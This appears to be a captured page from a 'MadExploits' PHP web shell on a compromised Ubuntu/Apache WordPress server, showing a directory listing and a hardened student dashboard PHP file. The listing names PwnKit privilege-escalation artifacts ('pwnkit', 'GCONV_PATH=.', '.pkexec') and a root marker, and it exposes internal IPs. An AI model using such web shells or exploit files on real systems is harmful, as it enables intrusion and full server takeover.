Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
/
var /
www /
html /
cipd /
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
applications
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
wp-admin
[ DIR ]
drwxrwxr-x
wp-content
[ DIR ]
drwxrwxr-x
wp-includes
[ DIR ]
drwxrwxr-x
.htaccess
523
B
-rwxrwxr-x
.mad-root
0
B
-rw-r--r--
admin_dashboard.php
20.42
KB
-rw-r--r--
admin_login.php
8.62
KB
-rw-r--r--
index.php
405
B
-rwxrwxr-x
license.txt
19.45
KB
-rwxrwxr-x
old-data.tar
381.81
MB
-rwxrwxr-x
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rwxrwxr-x
student_dashboard.php
24.53
KB
-rw-r--r--
student_form.php
15.23
KB
-rw-r--r--
student_login.php
7.94
KB
-rw-r--r--
student_ranking.php
17.12
KB
-rw-r--r--
wordpress-6.5.5.zip
24.98
MB
-rwxrwxr-x
wp-activate.php
7.21
KB
-rwxrwxr-x
wp-blog-header.php
351
B
-rwxrwxr-x
wp-comments-post.php
2.27
KB
-rwxrwxr-x
wp-config
3.12
KB
-rwxrwxr-x
wp-config-sample.php
2.94
KB
-rwxrwxr-x
wp-config.php
3.21
KB
-rw-rw-rw-
wp-cron.php
5.51
KB
-rwxrwxr-x
wp-links-opml.php
2.44
KB
-rwxrwxr-x
wp-load.php
3.83
KB
-rwxrwxr-x
wp-login.php
49.72
KB
-rwxrwxr-x
wp-mail.php
8.33
KB
-rwxrwxr-x
wp-settings.php
27.76
KB
-rwxrwxr-x
wp-signup.php
33.58
KB
-rwxrwxr-x
wp-trackback.php
4.77
KB
-rwxrwxr-x
xmlrpc.php
3.17
KB
-rwxrwxr-x
Code Editor : student_dashboard.php
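<?php
// student_dashboard.php
//
// Student dashboard: add a record (likes, photo, source), view the record
// history, and delete a record after a modal confirmation.
//
// Security notes for maintainers:
//  - Database credentials are read from the environment (variable names are
//    introduced by this revision) instead of being embedded in the file. A
//    password that was ever stored or displayed in source form must be
//    treated as disclosed and rotated.
//  - Every state-changing POST must carry the per-session CSRF token.
//  - Uploaded photos are stored under upload/ with a server-generated name;
//    the web server should be configured so that nothing in that directory
//    is executed as a script.
//  - Internal failure details are logged, never echoed to the browser.

session_start();
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// require login
if (empty($_SESSION['user_id'])) {
    header('Location: student_login.php');
    exit;
}

// Logout handler (GET). Handled before any database work so that logging
// out still succeeds when the database is unavailable.
if (isset($_GET['action']) && $_GET['action'] === 'logout') {
    $_SESSION = [];
    if (ini_get("session.use_cookies")) {
        $params = session_get_cookie_params();
        setcookie(
            session_name(),
            '',
            time() - 42000,
            $params["path"],
            $params["domain"],
            $params["secure"],
            $params["httponly"]
        );
    }
    session_destroy();
    header('Location: student_login.php');
    exit;
}

// Per-session CSRF token, embedded in both forms and verified on every POST.
if (empty($_SESSION['csrf_token']) || !is_string($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
$csrf_token = $_SESSION['csrf_token'];

$errors = [];
$success_msg = null;
$user = null;      // stays null if the lookup fails; the template tolerates that
$records = [];     // stays empty if the history query never runs
$allowed_sources = ["linkedin", "instagram", "facebook", "twitter"];
$upload_dir = __DIR__ . '/upload/'; // must be writable by the web server user
$max_size = 5 * 1024 * 1024; // 5MB

// Extension => exact MIME type the file content must have.
$allowed_mimes = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// SCRIPT_NAME carries no client-supplied path info (unlike PHP_SELF), so it
// is safe to use as the post/redirect/get target.
$self_url = $_SERVER['SCRIPT_NAME'] ?? 'student_dashboard.php';

$generic_error = "An internal error occurred. Please try again later.";

try {
    $db_password = getenv('CIPD_DB_PASSWORD');
    if ($db_password === false) {
        throw new RuntimeException('CIPD_DB_PASSWORD is not set in the environment.');
    }
    $conn = new mysqli(
        getenv('CIPD_DB_HOST') ?: 'localhost',
        getenv('CIPD_DB_USER') ?: 'cipd',
        $db_password,
        getenv('CIPD_DB_NAME') ?: 'cipd'
    );
    $conn->set_charset("utf8mb4");

    $user_id = (int) $_SESSION['user_id'];

    // Fetch basic user info from users table for display
    $stmt = $conn->prepare("SELECT id, name, email, phone, branch, year FROM users WHERE id = ? LIMIT 1");
    $stmt->bind_param("i", $user_id);
    $stmt->execute();
    $res = $stmt->get_result();
    $user = $res->fetch_assoc();
    $stmt->close();

    if (!$user) {
        throw new Exception("User not found.");
    }

    // Handle POST actions
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $action = is_string($_POST['action'] ?? null) ? $_POST['action'] : '';
        $posted_token = $_POST['csrf_token'] ?? '';

        // Constant-time comparison; a missing or non-string token fails too.
        $csrf_ok = is_string($posted_token) && hash_equals($csrf_token, $posted_token);
        if (!$csrf_ok) {
            $errors[] = "Invalid or expired form token. Please reload the page and try again.";
            $action = '';
        }

        // === Add record ===
        if ($action === 'add_record') {
            // collect and trim (non-string input, e.g. likes[]=1, is treated as empty)
            $likes_raw = is_string($_POST['likes'] ?? null) ? trim($_POST['likes']) : '';
            $source = is_string($_POST['source'] ?? null) ? trim($_POST['source']) : '';

            // server-side validations
            if ($likes_raw === '' || !preg_match('/^[0-9]+$/', $likes_raw)) {
                $errors[] = "Likes must be a non-negative integer (use 0 if none).";
            } else {
                $likes = (int) $likes_raw;
                if ($likes < 0) {
                    $errors[] = "Likes cannot be negative.";
                }
            }

            if ($source === '' || !in_array($source, $allowed_sources, true)) {
                $errors[] = "Please select a valid source.";
            }

            // handle photo upload (optional)
            $photo_url = null;
            if (isset($_FILES['photo'])) {
                $file = $_FILES['photo'];
                $upload_error = $file['error'] ?? UPLOAD_ERR_NO_FILE;

                if (!is_int($upload_error)) {
                    // An array here means a multi-file field was submitted.
                    $errors[] = "Only a single photo may be uploaded.";
                } elseif ($upload_error === UPLOAD_ERR_NO_FILE) {
                    // no photo supplied: nothing to do
                } elseif ($upload_error !== UPLOAD_ERR_OK) {
                    $errors[] = "Error uploading file (code {$upload_error}).";
                } else {
                    // Detect the type from the file content, not from client headers.
                    $finfo = finfo_open(FILEINFO_MIME_TYPE);
                    $mime = false;
                    if ($finfo !== false) {
                        $mime = finfo_file($finfo, $file['tmp_name']);
                        finfo_close($finfo);
                    }

                    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));

                    if (!array_key_exists($ext, $allowed_mimes)) {
                        $errors[] = "Allowed file formats: JPG, PNG, GIF.";
                    } elseif ($mime === false || $mime !== $allowed_mimes[$ext]) {
                        // The detected type must equal the type implied by the
                        // extension. Accepting any "image/*" type would let
                        // content of a non-allowed image type through under
                        // an allowed extension.
                        $errors[] = "File type mismatch detected.";
                    } elseif ($file['size'] > $max_size) {
                        $errors[] = "File exceeds maximum size of 5MB.";
                    } elseif (!is_dir($upload_dir) && !mkdir($upload_dir, 0755, true)) {
                        $errors[] = "Failed to create upload directory on server.";
                    } elseif (empty($errors)) {
                        // Server-generated name: the client-supplied file name
                        // never reaches the filesystem.
                        $random = bin2hex(random_bytes(8));
                        $safe_name = time() . "_" . $random . "." . $ext;
                        $target = $upload_dir . $safe_name;
                        if (!move_uploaded_file($file['tmp_name'], $target)) {
                            $errors[] = "Failed to move uploaded file.";
                        } else {
                            // store relative path
                            $photo_url = 'upload/' . $safe_name;
                        }
                    }
                }
            }

            // Insert new record if no errors
            if (empty($errors)) {
                if ($photo_url !== null) {
                    $stmt = $conn->prepare("INSERT INTO student_records (user_id, likes, photo_url, source) VALUES (?, ?, ?, ?)");
                    $stmt->bind_param("iiss", $user_id, $likes, $photo_url, $source);
                } else {
                    $stmt = $conn->prepare("INSERT INTO student_records (user_id, likes, source) VALUES (?, ?, ?)");
                    $stmt->bind_param("iis", $user_id, $likes, $source);
                }
                if (!$stmt->execute()) {
                    throw new RuntimeException("Failed to add record: " . $stmt->error);
                }
                $stmt->close();
                // redirect to avoid repost + show newly added history
                header("Location: " . $self_url);
                exit;
            }
        }

        // === Delete record ===
        if ($action === 'delete_record') {
            $record_id = is_string($_POST['record_id'] ?? null) ? (int) $_POST['record_id'] : 0;
            if ($record_id <= 0) {
                $errors[] = "Invalid record id.";
            } else {
                // Verify record belongs to this user and fetch photo_url if any
                $stmt = $conn->prepare("SELECT photo_url FROM student_records WHERE id = ? AND user_id = ? LIMIT 1");
                $stmt->bind_param("ii", $record_id, $user_id);
                $stmt->execute();
                $res = $stmt->get_result();
                $r = $res->fetch_assoc();
                $stmt->close();

                if (!$r) {
                    $errors[] = "Record not found or access denied.";
                } else {
                    $photo_to_delete = $r['photo_url'] ?? null;

                    // Delete row (ownership is re-checked in the WHERE clause)
                    $stmt = $conn->prepare("DELETE FROM student_records WHERE id = ? AND user_id = ?");
                    $stmt->bind_param("ii", $record_id, $user_id);
                    if (!$stmt->execute()) {
                        throw new RuntimeException("Failed to delete record: " . $stmt->error);
                    }
                    $stmt->close();

                    // Remove the photo, but only if the stored path resolves
                    // to a regular file inside the upload directory. The path
                    // comes from the database, so it is not trusted to stay
                    // within upload/.
                    if (!empty($photo_to_delete)) {
                        $upload_root = realpath($upload_dir);
                        $candidate = realpath(__DIR__ . '/' . $photo_to_delete);
                        $inside_upload = $upload_root !== false
                            && $candidate !== false
                            && strpos($candidate, $upload_root . DIRECTORY_SEPARATOR) === 0;
                        if ($inside_upload && is_file($candidate)) {
                            // Best effort: the row is already gone, so a failed
                            // unlink is logged rather than reported to the user.
                            if (!@unlink($candidate)) {
                                error_log("student_dashboard: could not remove photo for record {$record_id}");
                            }
                        }
                    }

                    // success - redirect to clear POST
                    header("Location: " . $self_url);
                    exit;
                }
            }
        }
    }

    // Fetch all records (history) for this user
    $stmt = $conn->prepare("SELECT id, likes, photo_url, source, is_ranked, created_at FROM student_records WHERE user_id = ? ORDER BY created_at DESC");
    $stmt->bind_param("i", $user_id);
    $stmt->execute();
    $res = $stmt->get_result();
    $records = $res->fetch_all(MYSQLI_ASSOC);
    $stmt->close();

    // Format created_at timestamps to dd/mm/yy hh:mm am/pm
    foreach ($records as $k => $row) {
        $fmt = '';
        if (!empty($row['created_at'])) {
            try {
                $dt = new DateTime($row['created_at']);
                // format: day/month/two-digit-year 12-hour:minute am/pm
                $fmt = $dt->format('d/m/y h:i a'); // e.g. 17/11/25 04:52 pm
            } catch (Exception $e) {
                // unparseable timestamp: fall back to the raw column value
                $fmt = $row['created_at'];
            }
        }
        $records[$k]['created_at_fmt'] = $fmt;
    }
} catch (RuntimeException $e) {
    // mysqli_sql_exception extends RuntimeException, so driver and
    // configuration failures land here. Their messages can reveal account
    // names, hosts or SQL, so they go to the server log only.
    error_log('student_dashboard: ' . $e->getMessage());
    $errors[] = $generic_error;
} catch (Exception $e) {
    // Only messages authored in this file reach this branch.
    $errors[] = $e->getMessage();
} finally {
    if (isset($conn) && $conn instanceof mysqli) {
        $conn->close();
    }
}

// Values used by the template; safe even when the user lookup failed.
$display_name = (string) ($user['name'] ?? '');
?>
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Student Dashboard</title>
<style>
:root{ --bg:#f6f9fc; --card:#fff; --muted:#6b7280; --accent:#0b69ff; --danger:#dc2626; --radius:12px; --input-border:#e6e9ef; }
*{box-sizing:border-box}
body{margin:0;font-family:Inter, system-ui, -apple-system, "Segoe UI", Roboto, Arial;background:var(--bg);color:#0f172a;padding:30px;display:flex;justify-content:center;min-height:100vh}
.container{width:100%;max-width:1100px}
.header{display:flex;align-items:center;justify-content:space-between;margin-bottom:18px}
.h-title{font-size:20px;font-weight:700}
.card{background:var(--card);border-radius:var(--radius);box-shadow:0 12px 30px rgba(2,6,23,0.06);padding:20px;display:grid;grid-template-columns:300px 1fr;gap:24px}
@media(max-width:980px){.card{grid-template-columns:1fr}}
.profile-box{text-align:center;padding:10px}
.avatar{width:160px;height:160px;border-radius:12px;object-fit:cover;border:1px solid var(--input-border);background:#f8fafc}
.field{margin-bottom:12px}
.label{font-size:13px;color:var(--muted);margin-bottom:6px;font-weight:600}
.value{font-size:15px;color:#0f172a}
.form{padding:4px 6px}
.input, select{width:100%;padding:10px 12px;border-radius:8px;border:1px solid var(--input-border);font-size:14px;margin-bottom:10px}
.btn{background:var(--accent);color:#fff;padding:10px 14px;border-radius:10px;border:none;font-weight:700;cursor:pointer}
.btn.ghost{background:#fff;color:var(--accent);border:1px solid rgba(11,105,255,0.08)}
.alert{background:#fff4f4;border:1px solid #ffd7d7;padding:10px;border-radius:8px;color:var(--danger);margin-bottom:12px}
.success{background:#f0fdf4;border:1px solid #bbf7d0;padding:10px;border-radius:8px;color:#166534;margin-bottom:12px}
.helper{font-size:13px;color:var(--muted)}
.logout{background:#fff;color:var(--danger);border:1px solid rgba(220,38,38,0.08);padding:8px 10px;border-radius:8px;text-decoration:none}
.small{font-size:13px;color:var(--muted)}
/* history list */
.history { display:flex;flex-direction:column;gap:12px; }
.record { display:flex; gap:12px; align-items:center; padding:12px; border-radius:10px; background:#fbfdff; border:1px solid #eef2f6; }
.record-thumb { width:72px; height:72px; border-radius:8px; object-fit:cover; background:#f4f7fb; display:flex;align-items:center;justify-content:center; color:var(--muted); font-weight:700; font-size:18px; }
.record-meta { flex:1; }
.record-meta .row { display:flex; justify-content:space-between; gap:12px; align-items:center; }
.record-meta .small { color:var(--muted); font-size:13px; }
.record-actions { display:flex; gap:8px; align-items:center; }
/* add record button area */
.add-area { display:flex; gap:12px; align-items:center; justify-content:space-between; margin-bottom:14px; }
@media(max-width:600px){
  .add-area { flex-direction:column; align-items:stretch; }
  .record-meta .row { flex-direction:column; align-items:flex-start; gap:6px }
  .record { flex-direction:column; align-items:flex-start }
  .record-thumb { width:100%; height:140px }
}
/* small delete button */
.delete-btn { background:transparent; border:1px solid rgba(220,38,38,0.12); color:var(--danger); padding:6px 8px; border-radius:8px; cursor:pointer; font-weight:600; }
.delete-btn:hover { background:rgba(220,38,38,0.04); }
/* modal */
.modal-backdrop { position:fixed;inset:0;background:rgba(2,6,23,0.45);display:none;align-items:center;justify-content:center;padding:20px;z-index:9999; }
.modal { width:100%;max-width:520px;background:white;border-radius:12px;padding:20px;box-shadow:0 14px 40px rgba(2,6,23,0.2); }
.modal h3{margin:0 0 8px 0;font-size:18px}
.modal p{margin:0 0 14px 0;color:var(--muted)}
.modal .actions{display:flex;gap:10px;justify-content:flex-end}
.btn-danger{background:var(--danger);color:white;padding:10px 14px;border-radius:10px;border:none;cursor:pointer;font-weight:700}
.btn-cancel{background:#f3f4f6;color:#111;padding:10px 14px;border-radius:10px;border:none;cursor:pointer}
</style>
</head>
<body>
<div class="container">
  <div class="header">
    <div class="h-title">Student Dashboard</div>
    <div>
      <span class="small">Welcome, <?php echo htmlspecialchars($display_name); ?></span>
      •
      <a class="logout" href="?action=logout" >Logout</a>
    </div>
  </div>

  <div class="card" role="region" aria-label="Student dashboard">
    <div class="profile-box">
      <?php
      // show most recent photo from records if available, else initial
      $display_photo = '';
      if (!empty($records) && !empty($records[0]['photo_url'])) {
          $candidate = __DIR__ . '/' . $records[0]['photo_url'];
          if (file_exists($candidate)) {
              $display_photo = $records[0]['photo_url'];
          }
      }
      ?>
      <?php if ($display_photo !== ''): ?>
        <img src="<?php echo htmlspecialchars($display_photo); ?>" alt="Profile photo" class="avatar">
      <?php else: ?>
        <div class="avatar" style="display:flex;align-items:center;justify-content:center;font-size:40px;">
          <?php echo htmlspecialchars(mb_substr($display_name, 0, 1)); ?>
        </div>
      <?php endif; ?>

      <div class="field" style="margin-top:12px">
        <div class="label">Name</div>
        <div class="value"><?php echo htmlspecialchars($display_name); ?></div>
      </div>
      <div class="field">
        <div class="label">Email</div>
        <div class="value"><?php echo htmlspecialchars((string) ($user['email'] ?? '')); ?></div>
      </div>
      <div class="field">
        <div class="label">Phone</div>
        <div class="value"><?php echo htmlspecialchars((string) ($user['phone'] ?? '')); ?></div>
      </div>
      <div class="field">
        <div class="label">Branch / Year</div>
        <div class="value"><?php echo htmlspecialchars((string) ($user['branch'] ?? '')) . ' • ' . htmlspecialchars((string) ($user['year'] ?? '')); ?></div>
      </div>
    </div>

    <div>
      <?php if (!empty($errors)): ?>
        <div class="alert" role="alert">
          <ul style="margin:0 0 0 18px">
            <?php foreach ($errors as $err): ?>
              <li><?php echo htmlspecialchars($err); ?></li>
            <?php endforeach; ?>
          </ul>
        </div>
      <?php endif; ?>

      <?php if (!empty($success_msg)): ?>
        <div class="success"><?php echo htmlspecialchars($success_msg); ?></div>
      <?php endif; ?>

      <!-- Add record form -->
      <div class="add-area">
        <div style="flex:1">
          <form id="addRecordForm" method="POST" enctype="multipart/form-data" novalidate>
            <input type="hidden" name="action" value="add_record">
            <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($csrf_token); ?>">
            <div style="display:grid;grid-template-columns:1fr 160px;gap:10px;align-items:end">
              <div>
                <label class="label" for="likes">Likes</label>
                <input id="likes" name="likes" class="input" type="number" min="0" step="1" placeholder="e.g. 42" required>
              </div>
              <div>
                <label class="label" for="source">Source</label>
                <select id="source" name="source" class="input" required>
                  <option value="">Select Source</option>
                  <?php foreach ($allowed_sources as $s): ?>
                    <option value="<?php echo htmlspecialchars($s); ?>"><?php echo htmlspecialchars(ucfirst($s)); ?></option>
                  <?php endforeach; ?>
                </select>
              </div>
            </div>
            <div style="display:flex;gap:10px;margin-top:10px;align-items:center">
              <div style="flex:1">
                <label class="label" for="photo">Photo (optional)</label>
                <input id="photo" name="photo" class="input" type="file" accept="image/*">
              </div>
              <div style="display:flex;flex-direction:column;gap:8px">
                <button type="submit" class="btn">Add Record</button>
              </div>
            </div>
          </form>
        </div>
      </div>

      <!-- History list -->
      <h3 style="margin:10px 0 12px 0">History</h3>
      <div class="history" id="historyList">
        <?php if (empty($records)): ?>
          <div class="small" style="color:var(--muted)">No records yet. Use "Add Record" to create the first entry.</div>
        <?php else: ?>
          <?php foreach ($records as $r): ?>
            <div class="record" id="record-<?php echo (int)$r['id']; ?>">
              <?php
              $thumb = '';
              if (!empty($r['photo_url'])) {
                  $candidate = __DIR__ . '/' . $r['photo_url'];
                  if (file_exists($candidate)) {
                      $thumb = $r['photo_url'];
                  }
              }
              ?>
              <div class="record-thumb">
                <?php if ($thumb !== ''): ?>
                  <img src="<?php echo htmlspecialchars($thumb); ?>" alt="photo" style="width:100%;height:100%;border-radius:8px;object-fit:cover">
                <?php else: ?>
                  <?php echo htmlspecialchars(mb_substr($display_name, 0, 1)); ?>
                <?php endif; ?>
              </div>
              <div class="record-meta">
                <div class="row">
                  <div>
                    <div style="font-weight:700"><?php echo htmlspecialchars((string) $r['likes']); ?> likes</div>
                    <div class="small"><?php echo htmlspecialchars(ucfirst((string) $r['source'])); ?></div>
                  </div>
                  <div class="small"><?php echo htmlspecialchars((string) ($r['created_at_fmt'] ?? $r['created_at'])); ?></div>
                </div>
              </div>
              <div class="record-actions">
                <?php if (!empty($r['is_ranked'])): ?>
                  <span style="background:#eefaf0;color:#166534;padding:6px 8px;border-radius:6px;font-weight:600;font-size:13px">Ranked</span>
                <?php endif; ?>
                <!-- Delete button: opens modal -->
                <button class="delete-btn" data-record-id="<?php echo (int)$r['id']; ?>" aria-label="Delete record <?php echo (int)$r['id']; ?>">Delete</button>
              </div>
            </div>
          <?php endforeach; ?>
        <?php endif; ?>
      </div>
    </div>
  </div>
</div>

<!-- Hidden delete form (submitted by modal confirm) -->
<form id="deleteForm" method="POST" style="display:none;">
  <input type="hidden" name="action" value="delete_record">
  <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($csrf_token); ?>">
  <input type="hidden" name="record_id" id="deleteRecordId" value="">
</form>

<!-- Modal markup -->
<div id="modalBackdrop" class="modal-backdrop" role="dialog" aria-modal="true" aria-hidden="true" aria-labelledby="modalTitle">
  <div class="modal" role="document">
    <h3 id="modalTitle">Delete record</h3>
    <p id="modalDesc">Are you sure you want to delete this record? This action cannot be undone.</p>
    <div class="actions" style="margin-top:16px">
      <button id="modalCancel" class="btn-cancel" type="button">Cancel</button>
      <button id="modalConfirm" class="btn-danger" type="button">Delete</button>
    </div>
  </div>
</div>

<script>
(function(){
  // Add record form validation (convenience only; the server re-validates)
  const addForm = document.getElementById('addRecordForm');
  const likes = document.getElementById('likes');
  const source = document.getElementById('source');
  const addSubmit = addForm.querySelector('button[type="submit"]');

  function validateAdd() {
    const lv = likes.value.trim();
    const sv = source ? source.value : '';
    const ok = /^[0-9]+$/.test(lv) && sv !== '';
    addSubmit.disabled = !ok;
  }
  likes.addEventListener('input', validateAdd);
  if (source) source.addEventListener('change', validateAdd);
  validateAdd();

  addForm.addEventListener('submit', function(e){
    const lv = likes.value.trim();
    if (!/^[0-9]+$/.test(lv)) {
      e.preventDefault();
      alert('Likes must be a non-negative integer.');
      likes.focus();
      return false;
    }
    if (source && source.value === '') {
      e.preventDefault();
      alert('Please select a source.');
      source.focus();
      return false;
    }
  });

  // Modal delete logic
  const modalBackdrop = document.getElementById('modalBackdrop');
  const modalCancel = document.getElementById('modalCancel');
  const modalConfirm = document.getElementById('modalConfirm');
  const deleteForm = document.getElementById('deleteForm');
  const deleteRecordIdInput = document.getElementById('deleteRecordId');

  // Open modal when any delete button clicked
  document.querySelectorAll('.delete-btn').forEach(btn => {
    btn.addEventListener('click', function(e){
      const rid = this.getAttribute('data-record-id');
      if (!rid) return;
      deleteRecordIdInput.value = rid;
      openModal();
    });
  });

  function openModal(){
    modalBackdrop.style.display = 'flex';
    modalBackdrop.setAttribute('aria-hidden', 'false');
    // focus confirm button for accessibility
    modalConfirm.focus();
    // trap focus simple: prevent tab from leaving (small helper)
    document.addEventListener('focus', trapFocus, true);
  }

  function closeModal(){
    modalBackdrop.style.display = 'none';
    modalBackdrop.setAttribute('aria-hidden', 'true');
    deleteRecordIdInput.value = '';
    document.removeEventListener('focus', trapFocus, true);
  }

  modalCancel.addEventListener('click', function(){ closeModal(); });

  // Confirm -> submit hidden form
  modalConfirm.addEventListener('click', function(){
    // submit delete form
    deleteForm.submit();
  });

  // Close modal on backdrop click (outside modal content)
  modalBackdrop.addEventListener('click', function(e){
    if (e.target === modalBackdrop) closeModal();
  });

  // Close modal on Escape key
  window.addEventListener('keydown', function(e){
    if (e.key === 'Escape' && modalBackdrop.style.display === 'flex') {
      closeModal();
    }
  });

  // Very small focus trap: keeps focus inside modal while open
  function trapFocus(event){
    if (modalBackdrop.style.display !== 'flex') return;
    const modal = modalBackdrop.querySelector('.modal');
    if (!modal.contains(event.target)) {
      event.stopPropagation();
      modalConfirm.focus();
    }
  }
})();
</script>
</body>
</html>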